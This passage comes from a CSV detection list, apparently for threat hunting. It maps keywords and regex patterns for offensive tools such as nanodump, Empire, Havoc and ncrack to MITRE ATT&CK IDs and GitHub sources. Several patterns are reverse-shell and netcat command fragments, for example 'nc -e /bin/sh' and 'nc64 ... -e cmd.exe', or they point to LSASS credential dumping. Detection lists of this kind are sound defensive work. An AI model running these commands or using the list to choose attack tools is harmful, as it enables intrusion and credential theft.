A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ssp*",".{0,1000}nanodump_ssp.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*nanodump_ssp*",".{0,1000}nanodump_ssp.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ssp.x64*",".{0,1000}nanodump_ssp\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ssp.x64.dll*",".{0,1000}nanodump_ssp\.x64\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*nanodump_ssp.x64.dll*",".{0,1000}nanodump_ssp\.x64\.dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ssp.x86*",".{0,1000}nanodump_ssp\.x86.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ssp_embedded.*",".{0,1000}nanodump_ssp_embedded\..{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*NanoDumpChoose*",".{0,1000}NanoDumpChoose.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*nanodump-pipes*",".{0,1000}nanodump\-pipes.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*NanoDumpWriteDump*",".{0,1000}NanoDumpWriteDump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanorobeus*_cs.x64.*",".{0,1000}nanorobeus.{0,1000}_cs\.x64\..{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus*_cs.x86.*",".{0,1000}nanorobeus.{0,1000}_cs\.x86\..{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus*dump*",".{0,1000}nanorobeus.{0,1000}dump.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus.cna*",".{0,1000}nanorobeus\.cna.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus.py*",".{0,1000}nanorobeus\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*nanorobeus.x64*",".{0,1000}nanorobeus\.x64.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus.x64.*",".{0,1000}nanorobeus\.x64\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*nanorobeus.x86*",".{0,1000}nanorobeus\.x86.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus_brc4*",".{0,1000}nanorobeus_brc4.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus64*",".{0,1000}nanorobeus64.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" 
"*nanorobeus86*",".{0,1000}nanorobeus86.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus-main*",".{0,1000}nanorobeus\-main.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorubeus.*",".{0,1000}nanorubeus\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*Narasimha1997/fake-sms*",".{0,1000}Narasimha1997\/fake\-sms.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2663","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" "*Nasir Khan (r0ot h3x49)*",".{0,1000}Nasir\sKhan\s\(r0ot\sh3x49\).{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" 
"*nasm -f win64 ./syscalls.asm -o ./syscalls.obj*",".{0,1000}nasm\s\-f\swin64\s\.\/syscalls\.asm\s\-o\s\.\/syscalls\.obj.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*NativeDump.exe *.dmp*",".{0,1000}NativeDump\.exe\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*NativeEasyHook32.dll*",".{0,1000}NativeEasyHook32\.dll.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*NativeEasyHook64.dll*",".{0,1000}NativeEasyHook64\.dll.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*Naughty-Script.ps1*",".{0,1000}Naughty\-Script\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*NBNSBruteForceHost*",".{0,1000}NBNSBruteForceHost.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
"*NBNSBruteForcePause*",".{0,1000}NBNSBruteForcePause.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*NBNSBruteForceSpoofer*",".{0,1000}NBNSBruteForceSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*NBNSBruteForceTarget*",".{0,1000}NBNSBruteForceTarget.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*nbnsspoof.py*",".{0,1000}nbnsspoof\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*NBNSSpoofer*",".{0,1000}NBNSSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*nc 127.0.0.1 4000*",".{0,1000}nc\s127\.0\.0\.1\s4000.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*nc -e /bin/sh * *",".{0,1000}nc\s\-e\s\/bin\/sh\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*nc -nlvp 
4444*",".{0,1000}nc\s\-nlvp\s4444.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","0","N/A","N/A","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*nc -vlp 4444*",".{0,1000}nc\s\-vlp\s4444.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*nc -vlp 4445*",".{0,1000}nc\s\-vlp\s4445.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*nc.exe 127.0.0.1 4444*",".{0,1000}nc\.exe\s127\.0\.0\.1\s4444.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*nc.exe -l -p 1337*",".{0,1000}nc\.exe\s\-l\s\-p\s1337.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege
Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*nc64 127.0.0.1 9000 -e cmd.exe*",".{0,1000}nc64\s127\.0\.0\.1\s9000\s\-e\scmd\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*nc64 -L -vv -p 9000*",".{0,1000}nc64\s\-L\s\-vv\s\-p\s9000.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*nccgroup/ABPTTS*",".{0,1000}nccgroup\/ABPTTS.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*nccgroup/Accomplice*",".{0,1000}nccgroup\/Accomplice.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*nccgroup/demiguise*",".{0,1000}nccgroup\/demiguise.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. 
The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","9","10","1344","253","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "*nccgroup/SCOMDecrypt*",".{0,1000}nccgroup\/SCOMDecrypt.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*ncrack-*.dmg*",".{0,1000}ncrack\-.{0,1000}\.dmg.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","1016","233","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z" "*ncrack-*-setup.exe*",".{0,1000}ncrack\-.{0,1000}\-setup\.exe.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","1016","233","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z" "*ncrack.exe*",".{0,1000}ncrack\.exe.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication 
cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","1016","233","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z" "*NcrackInstaller.exe*",".{0,1000}NcrackInstaller\.exe.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","1016","233","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z" "*ncrack-master.zip*",".{0,1000}ncrack\-master\.zip.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","1016","233","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z" 